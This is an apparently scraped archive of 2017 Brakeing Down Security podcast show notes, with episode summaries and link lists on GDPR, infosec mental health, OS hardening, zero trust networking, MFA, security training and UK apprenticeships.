Xoke Soru: "why are you trying to make skynet and kill us all? Do you hate humanity?"
Who will ML replace? Who in security?
Ask why people get confused between AI and Machine learning, and where the fine line is between the two or is one actually a subset of the other.
Basically.. "in what way/how do you see ML being used in an offensive capacity in the future (or now)"
https://en.wikipedia.org/wiki/Artificial_neural_network
https://en.wikipedia.org/wiki/Machine_learning
https://en.wikipedia.org/wiki/Portal:Machine_learning
https://www.slideshare.net/allyslideshare/something-wicked-78511887
https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/61751
O’Reilly Conference 31 October
Mick douglas class
Derbycon CTF
Book club
Patreon
slack
Published on: August 3, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-025-How-GDPR-affects-US-Biz-with-Wendyck-Derbycon2017-CTF-info.mp3
GDPR (General Data Protection Regulation) is weighing on the minds and pocketbooks of a lot of European companies, but is the US as worried? If you read many of the news articles out there, it ranges from 'meh' to 'OMG, the sky, it is falling'. GDPR will cause a lot of new issues in the way business is being done, not just in the realm of security, but in the way data is managed, maintained, catalogued, and shared.
This week we invited Ms. Wendy Everette Knox (@wendyck) to come in and discuss some of the issues that might hit companies. We also discuss how GDPR and the exit (or not) of the UK from the #European #Union will affect data holders and citizens of the UK.
If your company is preparing for the #GDPR mandate, check out the show notes for a lot of good info.
ALSO, If you are looking for a ticket to #derbycon 2017, you need to listen to this show, because it has all the info you need to get started. The info is also in the show notes, including the form you need to post your flag information.
---Show Notes:----
The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a regulation by which the European Parliament, the Council of the European Union and the European Commission intend to strengthen and unify data protection for all individuals within the European Union (EU). It also addresses the export of personal data outside the EU. The primary objectives of the GDPR are to give control back to citizens and residents over their personal data and to simplify the regulatory environment for international business by unifying the regulation within the EU.[1]
Would it be better if companies stored less data, or de-anon it to the point where a breach
Massive fines for breaches. Usually some percentage of profits…
(up to 4% of annual global turnover or €20 Million (whichever is greater))
“Under the GDPR, the Data Controller will be under a legal obligation to notify the Supervisory Authority without undue delay. The reporting of a data breach is not subject to any de minimis standard and must be reported to the Supervisory Authority within 72 hours of the data breach (Article 33).”
Is 72 hours for notification realistic? For massive breaches, 72 hours is just enough time to contain
Right to be forgotten (not realistic):
“A right to be forgotten was replaced by a more limited right to erasure in the version of the GDPR adopted by the European Parliament in March 2014.[19][20] Article 17 provides that the data subject has the right to request erasure of personal data related to them on any one of a number of grounds including non-compliance with article 6.1 (lawfulness) that includes a case (f) where the legitimate interests of the controller is overridden by the interests or fundamental rights and freedoms of the data subject which require protection of personal data”
GDPR full text:
http://ec.europa.eu/newsroom/document.cfm?doc_id=45631
Good intro:
Controversial topics:
http://www.eugdpr.org/controversial-topics.html
Key Changes:
http://www.eugdpr.org/key-changes.html
Difficulty of doing GDPR in the cloud
https://hackernoon.com/why-gdpr-compliance-is-difficult-in-the-cloud-9755867a3662
US businesses largely ignoring GDPR
http://www.informationsecuritybuzz.com/expert-comments/us-businesses-ignoring-gdpr/#infosec
Fears of breach cover-up (due to massive fines ‘up to 4% of profits’)
http://tech.newstatesman.com/news/gdpr-cover-ups-security
From the UK ICO, 12 steps to take now to prepare for GDPR https://ico.org.uk/media/for-organisations/documents/1624219/preparing-for-the-gdpr-12-steps.pdf (has a nice infographic on p. 2)
CTF for derby ticket
Level 1-
The internet is a big place :) I’ve hidden 3 flags out on it and it’s your job to see how many you can find. I’ll give you a few hints to start.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-024-mental_health_podcast-with-Rand0h-and-tottenkoph.mp3
The infosec industry and its culture are very diverse, with many different points of view, thoughts and opinions, and many of us deal with our own internal demons: addictions, or mental afflictions like depression or bipolar disorder. 'Imposter syndrome' adds to the mix, making some believe they have to be constantly innovating or people will think negatively of them.
So this week, we invited Ms. Magen Wu (@tottenkoph) and Danny (@dakacki) to discuss some coping mechanisms for things like conferences, and for working from home, as a lot of consultants and researchers do...
--------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat and Defcon
-------
Brakesec also announces our "PowerShell for Blue Teamers and Incident Responders" course with Mick Douglas (@bettersafetynet). It is a 6 week course that starts with the basics of PowerShell and goes on to discuss frameworks that use PowerShell to assist in assessing your network. It starts on 10 July and runs each Monday evening until 14 August 2017. You'll receive a certificate suitable for CPE credit, and the videos of the class will be available to you on our YouTube channel.
To sign up, go to our Patreon page (http://www.patreon.com/bds_podcast) and sign up at the $20 USD level labeled "Blue Team Powershell - Attendee". If you just want the videos and to follow along in class, pick the $10 USD "Blue Team Powershell - Attendee- Videos Only" level. Classes will be held on Monday evenings only for 5 weeks, ending on 1 August.
--Show Notes--
Chris Sanders: Cult of Passion
http://chrissanders.org/2017/06/the-cult-of-passion/
Exercise
Start playing ingress or Pokemon Go, just to get out and gamify activity
Reduce alcohol consumption
Defcon : Friends of Bill W.
Agent X : 3/5K events at Defcon
Critics comments
You won’t please everyone, so don’t try
Spend time away from infosec
Family, friends
Hobbies
If you are in a job with ‘secrets’, find someone to talk to
Another person with the same ‘secrets’ or similar job
https://www.scientificamerican.com/article/gut-second-brain/
@DAkacki (what is your podcast @rallysec)
Da667’s book
[I love murder]@tottenkoph
@jimmyvo
@andMYhacks (works with Jimmy)
@infosecmentors
Published on: July 16, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-023-Jay_Beale-selinux-apparmor-securing_lxc.mp3
Jay Beale works for a pentest firm called "Inguardians", and has always been a fierce friend of the show. He's running a class at both BlackHat and Defcon all about hardening various parts of the Linux OS. This week, we discuss some of the concepts he teaches in the class.
Why do we disable SELinux? Is it as difficult to enable as everyone believes? What benefit do we get from using it?
We also discuss other hardening applications, like ModSecurity for Apache, Suhosin for PHP, and Linux Containers (LXC). What is gained by using these, and how can we use these to our advantage?
Really great discussion with Jay, and please sign up for his class for a two day in-depth discussion of all the technologies discussed on the show.
---
Show Notes:
AppArmor
SELinux
Privilege Escalation - InGuardians Murderboard
Port Knocking (Single Packet Authorization)
OSSEC
ModSecurity
Linux Containers
Jessie Frazelle - bane
Dan Walsh - SELinux
SELinux troubleshoot daemon
https://en.wikipedia.org/wiki/System_call
“In computing, a system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.”
OpenBSD pledge(2): https://man.openbsd.org/pledge.2
https://www.raspberrypi.org/products/raspberry-pi-2-model-b/
Suhosin
@inguardians
@jaybeale
----
What are you doing at Black Hat and Def Con?
Direct Link to Download: http://traffic.libsyn.com/brakeingsecurity/2017-022-windows_and_AD_Hardening.mp3
This week, we discuss hardening of Windows hosts utilizing CIS benchmarks. We talk about the 'auditpol' command. And we dredge up from ancient times (2000) the Microsoft article by Scott Culp, "The 10 Immutable Laws of Security Administration". Are they still applicable to today's environment, 17 years later?
--SHOW NOTES--
10 immutable laws of Security administration: https://technet.microsoft.com/library/cc722488.aspx
Really great stuff
Law #1: Nobody believes anything bad can happen to them, until it does
Law #2: Security only works if the secure way also happens to be the easy way
Law #3: If you don't keep up with security fixes, your network won't be yours for long
Law #5: Eternal vigilance is the price of security
Law #6: There really is someone out there trying to guess your passwords
Law #7: The most secure network is a well-administered one
Law #8: The difficulty of defending a network is directly proportional to its complexity
Law #9: Security isn't about risk avoidance; it's about risk management
Law #10: Technology is not a panacea
https://www.linkedin.com/in/scott-culp-cissp-8b69572a/
http://thehackernews.com/2017/06/hacker-arrested-for-hacking-microsoft.html
auditpol - https://technet.microsoft.com/en-us/library/cc731451(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc677002.aspx - Microsoft Security Compliance Manager
https://www.databreaches.net/leak-of-windows-10-source-code-raises-security-concerns/
Published on: July 3, 2017
Due to popular demand, we are adding the extra content from last week's show as a standalone podcast.
Michael Gough (@hackerHurricane) and Mr. Boettcher (BrakeSec co-host, @boettcherpwned) sit down and discuss the popularity of ransomware as a topic.
They discuss what email attachments to block, how to test your own email gateway, and what controls you should implement to help defend against the #petya #notpetya ransomware.
Published on: June 30, 2017
This week, we discussed Ms. Berlin's recent foray to CircleCityCon, 614con (@614con), and her recent webinars with O'Reilly.
One topic we discussed this week was how to reach out to small businesses about information security. Mr. Boettcher (@boettcherpwned) had just come from a panel discussion about an initiative in Austin, Texas called "MANIFEST", which sought to engage small business owners with #information #security professionals to help them secure their environments.
So we got to discussing how you might go about it in your local hometowns. Many of us live in smaller towns, with numerous small businesses that either don't know to secure their #POS #terminals (for example), or don't know to secure office information that isn't kept in a file cabinet. They may also just assume their outsourced IT company is doing that job, which could open them up to liability if something occurred. So we discuss ways to reach out, or get involved with your local community.
Secondly, we talk about software vulnerabilities found in the #CWE and the '7 Pernicious Kingdoms', which is one way people have classified vulnerabilities. We discuss one of the kingdoms, and how it is useful if you want to explain vuln classifications to developers.
Finally, after the show, Mr. Boettcher and Mr. Michael Gough, who has been on the show previously, discuss some #ransomware and why it's such a popular topic of discussion. (stay after the end music)
Published on: June 22, 2017
Hector Monsegur (@hxmonsegur on Twitter) is a good friend of the show, and we invited him to come on and discuss some of the #OSINT research he's doing to identify servers without using noisy techniques like DNS brute forcing.
We also discuss eClinicalWorks and their massive fine for falsifying testing of their EHR system, and the implications of that. What happens to customers' confidence in the product, and what happens if you're already a customer and realize you were duped by them?
We also discuss Hector's involvement with the TV show "Outlaw Tech". Who approached him, why he did it, why it's not CSI:Cyber or "Scorpion" and how it discusses the techniques used by bad guys.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-020-Hector_monsegur_DNS_research_OSINT.mp3
----------
Show notes:
going beyond DNS bruteforcing and passively discovering assets from public datasets???
Very interested in hearing about this
Straight OSINT, or what?
Hxm: Over at RSL (Rhino Sec Labs), one of the research projects I’m working on is discovery of assets (subdomains) while minimizing footprint (dns bruteforcing). Datasets include things like:
Training gained from internal phishing campaigns
Does it breed internal mis-trust?
Recent campaign findings
Why do it if we know one account is all it takes? Because we know it’s a ‘win’ for security?
Outlaw Tech on Science Channel
What’s it about? (let’s talk about the show)
http://www.dw.com/en/estonia-buoys-cyber-security-with-worlds-first-data-embassy/a-39168011 - ”Estonia buoys cyber security with world's first data embassy” - interesting
https://www.digitalcommerce360.com/2017/05/31/eclinicalworks-will-pay-feds-155-million-settle-false-claims-charges/ -- holy shit
-- Reminds me of the whole emissions scandal from a couple of years back. http://www.roadandtrack.com/new-cars/car-technology/a29293/vehicle-emissions-testing-scandal-cheating/
http://securewv.com/cfp.html
OneLogin/Docusign breaches
OneLogin: https://arstechnica.com/security/2017/06/onelogin-data-breach-compromised-decrypted/
Docusign: https://www.inc.com/sonya-mann/docusign-hacked-emails.html
http://www.spamfighter.com/News-20916-DocuSign-Data-Hack-Resulted-in-Malware-Ridden-Spam.htm
Crowdfunding to buy shadowbroker exploits ended: https://threatpost.com/crowdfunding-effort-to-buy-shadowbrokers-exploits-shuts-down/126010/
China's Cybersecurity Law: https://lawfareblog.com/chinas-cybersecurity-law-takes-effect-what-expect
Facial recognition for plane boarding: http://money.cnn.com/2017/05/31/technology/jetblue-facial-recognition/index.html
Keybase.io’s Chrome plugin -- Game changer? https://chrome.google.com/webstore/detail/easy-keybaseio-encryption/bhoocemedffiopognacolpjbnpncdegk/related?hl=en
Published on: June 14, 2017
This week, we invited Ms. Jessy Irwin (@jessysaurusrex) on to discuss the issues small and medium businesses and startups have with getting good, effective training, and what can be done to address these issues.
We also go through several ideas for subjects that should be addressed by training, and which might instead be addressed by policy.
-------
Upcoming BrakeSec Podcast training:
Ms. Sunny Wear - Web App Security/OWASP
14 June - 21 June - 28 June at 1900 Eastern (1600 Pacific, 2300 UTC)
$20 USD on Patreon to attend the class
$9 USD for just the videos to follow along in class
Patreon: https://www.patreon.com/bds_podcast
If you want the videos and don’t care about the class, they will be released a week after class is over for free.
Show Notes:
I don’t trust articles written with a survey created by a company that is touting their new education track at the bottom of the article. -- brbr
https://twitter.com/jessysaurusrex/status/859123589123121152
“So sick of the tired narrative that sec awareness is just about phishing when there are ~10 basic skills we need to be educating people on”
What are the ~10 things?
First off, most corporate security training misses the incentive mark by a mile. If training were refocused in a way that showed the incentives to improving personal safety, we might get somewhere. Teaching people how to take care of themselves first works-- those habits carry over into their work life, not usually the other way around.
“The report goes onto say that security awareness professionals with more technical backgrounds are more keen to recognizing behaviors that might bring risk, however, at times communications training is critical given that human interaction soft skills make changing risky employee behavior. They know what behaviors are the most effective in managing those risks. Often however, the challenge is that these same individuals often lack the skills or training to effectively communicate those risks and engage employees in a manner that effectively changes behavior.” summed up our entire industry in this paragraph --brbr
https://securingthehuman.sans.org/resources/security-awareness-report-2017
^^^^ saw this on Twitter yesterday -brbr
Key takeaways:
The study recommends the following for addressing communications:
You writing a book?
I've been working on a book about security that's focused on education and communication. We do such a horrible job at this-- we don't do very much that helps the average person or our non-technical, non-expert colleagues have a chance at being successful online. Our terms are too technical, our framing is unbelievably negative and toxic, and the lack of empathy for the people at the other end of the computer is absolutely astounding. It is entirely fixable, but we all have to stop contradicting one another and really start working together. :)
You make it sound so bleak and self-destructive :|
I would like to hope that we can get better.
Oh yea, the echo chamber, “who has the right answer?” no one, we all just have pieces...
Yes! And sometimes the right answer changes very, very quickly! It's less about the silver bullet answer and more about what we’re defending from and hoping to accomplish.
Are SMBs the issue?
Are they more insecure than bigger companies?
Or do bigger companies get more media coverage?
Are bigger companies any better at training employees?
Or are they better at ‘checking’ the box?
If we take the statement ‘paid for security training sucks’ as a given, what do we do about it?
What trainings should we be giving?
And what training should actually be policy driven? (make it a requirement to follow)
Clean desk
Password manager
Coding practices
Acceptable use
Device encryption
2FA/MFA
What training do infosec people need? How important are the soft skills to help with communicating?
Published on: June 6, 2017
We discuss SANS courses, including the one I just took (SEC504). How did I do in class? You can listen to the show and find out.
Since it's been a few weeks, we also discuss all the interesting WannaCry reports, the ease with which this vulnerability was exploited, and why a company would allow access to SMB (tcp port 445) from the Internet.
We discuss some upcoming training that we are holding starting 14 June. Ms. Sunny Wear will be doing 3 sessions discussing the use of Burp, and showing how to exploit various web application vulnerabilities. Details are in the show notes and in our Slack Channel.
Ms. Sunny Wear is doing a web app security class
Starts June 14th at 1900 Eastern (1600 Pacific, 2300 UTC)
Sign up for the class at the $20 dollar Patreon level (if you plan on attending)
Sign up for immediate video access at the $10 Patreon level (cannot attend class, but want to follow along)
Everyone will have access to the Slack Channel to follow along with the class, ask questions, etc (join our #slack channel for more information)
https://www.patreon.com/bds_podcast
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-018-SANS_course-EternalBlue-Samba-DerbyCon.mp3
SHOW NOTES:
SANS experience
Pity Quinceañera - I (bryan) sucked
Need more experience
Speed kills (I (bryan) got flustered and I shutdown) you took speed?
No Kali - was surprised, until I thought of why :D
Was not helpful to my team (jacek, ryan, Michael C., David)
John Strand was phenomenal
Frank Kim was great
The audio was not, unfortunately :(
Samba/SMB (port 445) vulns
Use case for having it exposed?
**** OPEN TO SUGGESTIONS *****
What does that say about the company?
No security team, or the security team is ineffectual about telling people about the risks?
What
MS17-010 is the new MS08-067
http://thehackernews.com/2017/05/samba-rce-exploit.html
Over 400,000 open to the web
https://en.wikipedia.org/wiki/WannaCry_ransomware_attack
Training announcement:
Ms. Sunny Wear doing a web app security class
Starts June 14th
Sign up for the class at the $20 dollar Patreon level
Sign up for immediate video access at the $10 Patreon level
https://www.patreon.com/bds_podcast
Whose Slide Is It Anyway? @ImprovHacker
#infosec #podcast #webAppSec #application #security
Published on: May 30, 2017
Zero trust networking may be a foreign concept to you, but Google and others have been utilizing this method of infrastructure and networking for quite a while now. It stands more traditional networking on its head by not having a boundary in the traditional sense. There's no VPN, no ACLs to audit, no firewall to maintain... Sounds crazy, right?
Well, it's all about trust, or the lack of it. No one trusts anyone without a proper chain of permission. 2FA, concepts of port knocking, and CA certificates are used to properly vet both the host and the server, and to keep the whole system safe and as secure as possible.
Sounds great, right? Well, as you can imagine, with our interview this week we find out that it's not perfect: people have to implement their own Zero Trust Networking solution, and unless you are a mature organization, with things like complete asset management, data flow, and configuration management, you aren't ready to implement it.
Join us as we discuss Zero Trust Networking with Doug Barth (@dougbarth), and Evan Gilman (@evan2645)
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-017-Zero_Trust_Networks.mp3
show notes:
The lines are blurring:
DevOps
NetOps
SDN
SDP
docker/containerization
2FA authentication
https://devcentral.f5.com/articles/load-balancing-versus-application-routing-26129
All good points, except no one wants to do the needful bits (ID’ing information, data flow, proper network design)
https://en.wikipedia.org/wiki/Software_Defined_Perimeter
Where is this Google article???
http://www.tomsitpro.com/articles/google-zerotrust-network-own-cloud,1-2608.html
https://cloud.google.com/beyondcorp/
https://www.theregister.co.uk/2016/04/06/googles_beyondcorp_security_policy/
Who benefits from this? Network engineers, apparently… :)
Devs?
IT?
Sounds like a security nightmare… who would get the blame for it failing
How do we keep users from screwing up the security model? Putting certs on their personal boxes?
Prior BrakeSec shows: Software Defined Perimeter with Jason Garbis
http://traffic.libsyn.com/brakeingsecurity/2017-011-Software_Defined_Perimeter.mp3
http://shop.oreilly.com/product/0636920052265.do
Doug Barth Twitter: @dougbarth
Evan Gilman Twitter: @evan2645
Runs counter, right? We are used to not trusting the client…
Only a mature company can implement it; prerequisites:
Device inventory
Config management
Data flow
Asset management
Micro-services?
Brownfield networks
Sidecar model -
Certain OSes not possible
Published on: May 9, 2017
Malware is big business, both for the people using it and for the people who sell companies blinky boxes, claiming they scare off the bad guys.
The latest marketdroid speak appears to be the term 'fileless malware', which by definition...
FTA: “Malware from a "fileless" attack is so-called because it resides solely in memory, with commands delivered directly from the internet. The approach means that there's no executable on disk and no artefacts ("files") for conventional computer forensic analysis to pick up, rendering the attacks stealthy, if not invisible. Malware infections will still generate potential suspicious network traffic.”
https://www.theregister.co.uk/2017/04/28/fileless_malware_menace/ -- by definition, not ‘fileless’
But many of the 'fileless' attacks require a 'file' to be opened to enable the initial infection.
This week, Michael Gough (@hackerhurricane) comes on to discuss his latest blog post (http://hackerhurricane.blogspot.com/2017/05/fileless-malware-not-so-fast-lets.html), and we discuss how much of today's malware classification and categorization fails to convey to leaders what the malware actually affects.
https://business.kaspersky.com/targeted-attacks-trends/6776/
http://www.binarydefense.com/powershell-injection-diskless-persistence-bypass-techniques/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-016-fileless_malware_reclassifying_malware_types.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Bsides Springfield, MO Eventbrite for Tickets: https://www.eventbrite.com/e/bsides-springfield-tickets-33495265240 (only 27 tickets left as of 28 Apr)
Published on: May 2, 2017
This week, we have a little story time. Developers should be aware of the kinds of vulnerabilities their code can be attacked with. XSS, buffer overflows, heap overflows, etc. should be terms that they understand. But is it enough that they are 'aware' of them, and yet seem to do nothing? Or should they be experts in their own particular area of development, and leave infosec people to deal with more generic issues?
We discuss the pros and cons of this argument this week, as well as why the idea of training people is flawed, because of who holds the purse strings.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-015-security_expert-vs-Security_aware_devs.mp3
Published on: April 27, 2017
So, I (Bryan) had a bit of a work issue to discuss. It has become one of my myriad jobs at work to write up some policies. In and of itself, it's not particularly fun work, and for whatever reason, this is causing me all kinds of issues. So this week we take a quick look at why I'm having these issues, and whether they are because I don't get it, or because the method I must follow is flawed.
After that, we add on to last week's show on #2FA and #MFA (http://traffic.libsyn.com/brakeingsecurity/2017-013-Multi-factor_auth_gotchas_with_Matt.mp3) by discussing why scientists are trying to create a 'master fingerprint' capable of opening mobile devices. We talk about FAR and FRR (false acceptance/rejection rates), and why the scientists may actually be able to pull it off.
We discussed Ms. Berlin's trip to the AIDE conference (https://appyide.org/), a two-day #DFIR conference held at Marshall University by our good friend Bill Gardner (@oncee on Twitter). She gave a great interactive talk on working through online wargames and CTFs, and we get her update on the conference.
Finally, we did discuss a bit about the #ShadowBroker dump of #NSA tools, and how differently people are reacting to this dump compared with the #Wikileaks #CIA dump.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-014-Policy_writing_for_the_masses-master_fingerprints_disneyland.mp3
--- show notes----
Discuss AIDE with Ms. Berlin
Log-MD.com posted their first video.
Fingerprint Masters (a case against biometrics):
http://www.digitaltrends.com/cool-tech/master-prints-unlock-phones/
Encrypted comms causing issues for employers: https://iapp.org/news/a/employers-facing-privacy-issues-with-encrypted-messaging-apps/
ShadowBrokers dump
“Worst since Snowden”
https://theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
Making policies, easier said than done
Discuss DefSec chapter on Policies
Difficulty: aligning policies with compliance standards
FedRamp, PCI, etc
Writing a good policy so that it follows the guidelines
http://shop.oreilly.com/product/0636920051671.do -- Defensive Security Handbook
Published on: April 20, 2017
Most everyone uses some kind of multi-factor or '2-factor authentication'. But our guest this week (who is going by "Matt", @infosec_meme) wanted to discuss some gotchas with regard to 2FA or MFA: the issues that come from over-reliance on 2FA, including some who believe it's the best thing ever. We finally discuss other methods of 2FA that don't just require a PIN from a mobile device or token.
We also discuss its use with concepts like "BeyondCorp", which is Google's take on the "Software Defined Perimeter" that we talked about a few weeks ago with @jasonGarbis (http://traffic.libsyn.com/brakeingsecurity/2017-011-Software_Defined_Perimeter.mp3).
This is a great discussion for people looking to implement 2FA at their organization, or who need ammunition if their boss thinks that all security is solved by using Google Auth.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-013-Multi-factor_auth_gotchas_with_Matt.mp3
Show Notes:
What does MFA try to solve:
Cred theft:
Phishing:
MFA / Bad things happening with that:
Phishing/2FA/Solutions?
Internal training / is this actually working?
Australia Post didn't think so
https://www.itnews.com.au/news/why-australia-post-ransomwared-its-own-staff-454987
Counterpoints:
It's irritating and does break at times ( https://twitter.com/dguido/status/842448889697447938 )
C: I don’t like running some silly app on my phone
C: I also don’t like running around with a physical token
C: Embedding a Yubico nano in my usb slot leaves me with one usb port left
Also doesn’t solve when someone just steals that token
Does any of it matter:
Beyondcorp / "Let's make the machine's state be part of the credential"
https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43231.pdf
Is there some way we (not google) can make it so a credential is worthless?
Solutions:
Duo / “There's an app on my phone and it has context about what wants to do something right now”
Probably a step in the right direction
Kind of like some Aus banks which SMS you before transferring $X to Y account
Okta - (grab links to spec)
META // Does this actually solve it?
OAUTH - (grab links to spec)
Attacking OAUTH - https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/
META // It’s not MFA, but it makes the cost of unrelated compromise significantly lower
META // Engineering things to short lived secrets is a better idea
I think one of the better ideas being put out was by Google in 2014, the ‘beyondcorp’ project (https://research.google.com/pubs/pub43231.html), simply put:
Obviously this is a massive undertaking and would require massive overhaul of everything, but it did look like Google were able to pull it off in the end. (https://research.google.com/pubs/pub44860.html).
Tavis is banging on LastPass again… https://www.ghacks.net/2017/03/21/full-last-pass-4-1-42-exploit-discovered/
Duo Security // Beyondcorp
https://duo.com/blog/beyondcorp-for-the-rest-of-us
More info on Beyondcorp
Misc// Hey google wrote a paper on U2F a while back
http://fc16.ifca.ai/preproceedings/25_Lang.pdf
Touched on briefly / “Secure Boot Stack and Machine Identity” at Google - Servers which need to boot up into a given state (Sounds like U/EFI except ‘ Google-designed security chip’)
https://cloud.google.com/security/security-design/resources/google_infrastructure_whitepaper_fa.pdf
META // Patrick Gray (sic) interviewed Duo last week and talked about the same thing
Published on: April 13, 2017
One of our Slackers (people who hang with us on our Slack Channel) mentioned that he was writing exam materials for one of the programs created by the UK Government to train high-school students and/or people headed to university in skills, without the traditional 4-year education track.
I was very intrigued by this, since we don't appear to have anything like this, outside of interning at a company, which means you're not considered a full-time employee, have no benefits, and there's no oversight of what you are learning. (Your mileage may vary.)
So we asked Liam Graves (@tunnytraffic) to come on and discuss his experience, and how he was enjoying it. We discuss various methods of alternative education here and in the UK, as well as why someone should possibly consider an apprenticeship. We also discuss how that would work in the US (or could it?).
Also, I'm very sorry, Ireland ... :) I did not mean to lump you in with the rest of the Commonwealth...
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-012-UK_Gov_apprenticeships_with_Liam_Graves.mp3
-----
HITB announcement:
“Tickets are on sale, and entering special code 'brakeingsecurity' at checkout gets you a 10% discount.” Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In The Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
--
Show Notes:
UK apprenticeship schemes:
Long established, though with a recent focus shift back from academic achievement to hands-on skills, and toward understanding/applying more than just remembering.
End Point Assessment - project based final assessment.
A mix of targeted learning and on-the-job experience working towards a brief: https://www.thetechpartnership.com/globalassets/pdfs/apprenticeship-standards/cyber-intrusion-analysis/occupational-brief-cyber-intrusion-analyst.pdf
Boring, but some background reading. Apprentices at this level will use levels 1-3 of Bloom’s taxonomy (https://en.wikipedia.org/wiki/Bloom's_taxonomy): 1) Remembering ("what" type questions), 2) Understanding ("which of these"/"why" type questions), 3) Applying ("if this, then what" scenarios and questions).
Other schemes include (new and existing):
https://www.gov.uk/apply-apprenticeship (links for Scotland & Wales on the same page).
https://www.thetechpartnership.com/about/ - employers drive the training for the type of employees they need.
Routes to employment - fast-paced industry, so 1) older pathways may not be relevant; 2) there are so many ways into the industry, pick the right one for you - there’s a difference between people who appreciate structured learning, are autodidactic, learn extra and over what’s expected, dev, risk, red/blue team, academic, hands-on, etc.
Internships (rarer, though some degrees offer a year in industry and will assist in making positions available)
Graduate schemes - very common, will give a grad opportunities to move around the business. Direct hires from uni.
IBM has a trade school - hiring 2,000 US Veterans in the next 5 years
https://www.axios.com/ibm-2000-jobs-exclusive-2317626492.html
Technical schools
http://www.browardtechnicalcolleges.com/
http://www.bates.ctc.edu/ITSpecialist
DoL apprenticeship programs
https://oa.doleta.gov/bat.cfm
Difference between ‘for-profit’ and ‘trade schools’
Internships = some companies are paying fat bank:
Washington State trades/apprenticeships
Mostly ‘blue’ collar positions
http://www.lni.wa.gov/TradesLicensing/Apprenticeship/Programs/TradeDescrip/
Few ‘technical positions’
Not sure there is an ‘apprenticeship’ in the US, outside of ‘internships’ that are given to college students
No ‘junior security architects’, or ‘junior pentesters’
Yet non-technical positions have junior slots
Manager / Senior manager, Project manager / Sr. Project manager
Difficulty in infosec apprenticeships
What are the ‘starter’ jobs?
IT related
Sysadmins
Log analyst
Useful links:
https://www.gov.uk/government/news/huge-response-to-join-cyber-security-apprenticeship-scheme
https://www.gov.uk/guidance/cyber-security-cni-apprenticeships
https://www.ncsc.gov.uk/new-talent
All available apprenticeships:
https://www.gov.uk/government/collections/apprenticeship-standards
Employer commitments:
https://www.gov.uk/take-on-an-apprentice
For people looking to pivot from non-Infosec jobs into cyber security:
https://cybersecuritychallenge.org.uk/about/new-to-the-challenge
Published on: April 5, 2017
We talked with Jason Garbis this week about Software Defined Perimeter (SDP). Ever thought about going completely without needing a VPN? Do you think I just made a crazy suggestion and am off my medications? Google has been doing it for years, and organizations like the Cloud Security Alliance are expecting this to be the next big tech innovation. So much so, that they are already drafting version 2 of the SDP guidelines.
So after talking with a friend of mine about how they were trying to implement it, he suggested talking to Jason, since he was on the steering committee for it. While Jason does work for a company that sells this solution, our discussion with him is very vendor agnostic, and he even discusses an open source version of SDP that you could implement or test out as a PoC (details in show notes below).
This is a great topic to stay on top of, as one day, your CTO/CIO or manager will come by and ask about the feasibility of implementing this, especially if your company assets are cloud based... So have a listen!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-011-Software_Defined_Perimeter.mp3
Itunes: (look for '2017-011') https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
---
Show Notes:
https://en.wikipedia.org/wiki/Software_Defined_Perimeter
https://cloudsecurityalliance.org/group/software-defined-perimeter/
Hmmm… seems like a standard created by companies selling their products for it
Have a product, create a problem, fix the problem...
How much alike is this to things like ‘Beyondcorp’?
http://www.networkworld.com/article/3053561/security/learning-about-sdp-via-google-beyondcorp.html
De-perimeterization - removing all the bits ‘protecting’ your computer
Treat your computers as ‘on the Internet’
https://en.wikipedia.org/wiki/De-perimeterisation
https://collaboration.opengroup.org/jericho/SPC_swhitlock.pdf
https://github.com/WaverleyLabs/SDPcontroller
2FA becomes much more important, or just plain needed, IMO --brbr
Questions:
How will development of applications change when attempting to implement these technologies?
If we allow deperimeterization of legacy apps (like Oracle products), with a complicated security model, how do you keep these older apps under control?
Can this cut down on the “Shadow IT” issue? Does the user control the certs?
How does this work with devices with no fully realized operating systems?
Phones, HVAC, IoT
Legacy SCADA or mainframes?
What is the maturity level of a company to implement this?
What minimum requirements are needed?
Asset management?
Policies?
Who/how do you monitor this?
More blinky boxes?
Will WAFs and Web proxies still function as expected?
Are there any companies where this is not a good fit?
What’s the typical timeline for moving to this network model?
What’s the best way to deploy this?
Blow up old network, insert new network?
Phase it in with new kit, replacing old kit?
Compliance
How do you explain this to auditors?
“We don’t have firewalls, that’s for companies that suck, we are 1337”
Other than “scalability” (which seems like regular solutions would have as well) I’d like to know what real value they provide
Published on: March 29, 2017
Our very own Ms. Berlin and Mr. Lee Brotherston (@synackpse), veteran of the show, co-authored an #O'Reilly book called the "Defensive Security Handbook".
We talk with Amanda and Lee (or Lee and Amanda :D ) about why they wrote the book, how people should use the book, and how you can maximize your company's resources to protect you.
